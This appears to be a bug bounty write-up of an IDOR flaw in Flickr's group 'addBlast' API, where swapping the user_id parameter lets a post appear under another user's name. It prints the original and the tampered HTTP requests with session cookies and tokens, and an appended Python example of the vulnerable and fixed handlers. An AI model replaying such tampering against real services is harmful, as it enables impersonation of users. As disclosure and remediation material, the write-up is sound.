Spoof a user to create a description of a group in Flickr

Hi guys, I'm now in San Francisco and I'm very happy because I met a lot of hackers at HackerOne h1-415. I am very grateful to have participated. Since it's raining, I decided to write this post in the hotel.

I love the Yahoo program: it has a very large scope, and it is very pleasant to be able to study the technology and the behavior of its services. Sometimes it takes a lot of time to exploit something; however, every sacrifice has its reward.

I decided to look for vulnerabilities in Flickr, a website I had not worked with before. Flickr has multiple services in which you can do cross-account tests, fraud tests, authorization tests, etc.

Among the many tests I did, I came to the groups section, where I first created a group:

Group created by user A

After creating this group, I went to create a group description.

Group Description

Next, as the administrator user, I modified the description I had created. Doing this generated the following request:

Original Request

POST /services/rest HTTP/1.1
Host: api.flickr.com
Connection: close
Content-Length: 341
Origin: https://www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: https://www.flickr.com/groups/3112603@N20/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: xb=494601; ffs=138666580-1480; cookie_accid=138666580; cookie_epass=my_cookies; localization=es-us%3Bcl%3Bcl; BX=f5kvta5ud0g9q&b=4&d=lq1Mmb1pYFSvzX1jAve8cwScqQs-&s=lv&i=rsUJjvasshshdhsJ; sa=1518891368%3A138671920%40N05%3A38475100499aa04d205cdff7870c0eb1; cookie_session=cookie flrbp=1518801856-6-b625b3cb6510531eab398458f7289ac17cab92931; flrbrp=1518801856-3664c6a6799b3d9a83842bd2f37d76ff9bd2aa6b7; flrb=15; vp=1349%2C662%2C1%2C17%2Cgroup-pool-preview-view%3A1063%2Csearch-photos-everyone-view%3A1079%2Cphotolist-container%3A1079%2Cprofile-container%3A1079%2Cshowcase-container%3A863; RT=s=1518803429246&u=&r=https%3A//www.flickr.com/groups_create.gne

group_id=3112603%40N20&blast=This%20is%20a%20rule%20with%20user%20A&user_id=138671920%40N05&extras=gimme_blast&viewerNSID=138671920%40N05&method=flickr.groups.addBlast&csrf=1518832271%3Ahfolijlgt08%3A5325f7c116aefd8f69552aaaafbcbec2&api_key=c7043c721fa36090f475fed2d4e92aa3&format=json&hermes=1&hermesClient=1&reqId=f5def5f4&nojsoncallback=1

I thought: what would happen if I replaced the value of the user_id parameter with another user's ID? So I carried out the following process:

Modified Request

POST /services/rest HTTP/1.1
Host: api.flickr.com
Connection: close
Content-Length: 341
Origin: https://www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: https://www.flickr.com/groups/3112603@N20/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: xb=494601; ffs=138666580-1480; cookie_accid=138666580; cookie_epass=my_cookies; localization=es-us%3Bcl%3Bcl; BX=f5kvta5ud0g9q&b=4&d=lq1Mmb1pYFSvzX1jAve8cwScqQs-&s=lv&i=rsUJjvasshshdhsJ; sa=1518891368%3A138671920%40N05%3A38475100499aa04d205cdff7870c0eb1; cookie_session=cookie flrbp=1518801856-6-b625b3cb6510531eab398458f7289ac17cab92931; flrbrp=1518801856-3664c6a6799b3d9a83842bd2f37d76ff9bd2aa6b7; flrb=15; vp=1349%2C662%2C1%2C17%2Cgroup-pool-preview-view%3A1063%2Csearch-photos-everyone-view%3A1079%2Cphotolist-container%3A1079%2Cprofile-container%3A1079%2Cshowcase-container%3A863; RT=s=1518803429246&u=&r=https%3A//www.flickr.com/groups_create.gne

group_id=3112603%40N20&blast=This%20is%20a%20rule%20with%20user%20B&user_id=147120294%40N08&extras=gimme_blast&viewerNSID=138671920%40N05&method=flickr.groups.addBlast&csrf=1518832271%3Ahfolijlgt08%3A5325f7c116aefd8f69552aaaafbcbec2&api_key=c7043c721fa36090f475fed2d4e92aa3&format=json&hermes=1&hermesClient=1&reqId=f5def5f4&nojsoncallback=1

This is what I got:

Spoof another user

As you can see, the victim user's account has been spoofed. (Another user's ID can be obtained in multiple ways: by commenting on a user's photos, liking photos, etc.)

The impact is that a user could write content in their group under another user's name; in this way the confidentiality of the victim user's account would be affected.
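To make the root cause concrete, here is an added example (not Flickr's code) of the server-side flaw the two requests above reveal: the admin check is tied to the session, but the author of the blast is taken from the client-supplied user_id instead of the authenticated user. The SESSIONS and GROUP_ADMINS tables, the session cookie value and the two handler functions are assumptions; the NSIDs and request parameters are the ones captured on this page.

```python
from urllib.parse import parse_qs

# Constructed stand-ins for Flickr's session store and group membership
# (the NSIDs are the ones that appear in the captured requests on this page).
USER_A = "138671920@N05"   # group admin, owner of the session cookie
USER_B = "147120294@N08"   # victim whose NSID was substituted into user_id
SESSIONS = {"session-of-user-A": USER_A}      # cookie_session value -> NSID
GROUP_ADMINS = {"3112603@N20": {USER_A}}      # group_id -> admin NSIDs

def parse_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def add_blast_vulnerable(session_cookie: str, body: str) -> dict:
    """Vulnerable pattern: the admin check uses the session, but the blast is
    attributed to whatever user_id the client put in the body."""
    p = parse_body(body)
    if SESSIONS.get(session_cookie) not in GROUP_ADMINS.get(p["group_id"], set()):
        return {"stat": "fail", "reason": "not a group admin"}
    return {"stat": "ok", "author": p["user_id"], "blast": p["blast"]}

def add_blast_fixed(session_cookie: str, body: str) -> dict:
    """Hardened pattern: the author is always the authenticated session user.
    A user_id that disagrees with the session is rejected, and is worth
    logging: it is a strong signal that the request was tampered with."""
    p = parse_body(body)
    actor = SESSIONS.get(session_cookie)
    if actor is None:
        return {"stat": "fail", "reason": "no valid session"}
    if actor not in GROUP_ADMINS.get(p["group_id"], set()):
        return {"stat": "fail", "reason": "not a group admin"}
    if p.get("user_id", actor) != actor:
        return {"stat": "fail", "reason": "user_id does not match session user"}
    return {"stat": "ok", "author": actor, "blast": p["blast"]}

# The relevant parameters of the original and modified request bodies shown above.
ORIGINAL_BODY = ("group_id=3112603%40N20&blast=This%20is%20a%20rule%20with%20user%20A"
                 "&user_id=138671920%40N05&extras=gimme_blast&viewerNSID=138671920%40N05"
                 "&method=flickr.groups.addBlast")
MODIFIED_BODY = ORIGINAL_BODY.replace("user%20A", "user%20B").replace(
    "user_id=138671920%40N05", "user_id=147120294%40N08")

if __name__ == "__main__":
    for handler in (add_blast_vulnerable, add_blast_fixed):
        print(handler.__name__, handler("session-of-user-A", MODIFIED_BODY))
```

Running it shows the vulnerable handler attributing the blast to user B while the fixed one rejects the request outright.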

Thank you

@saamux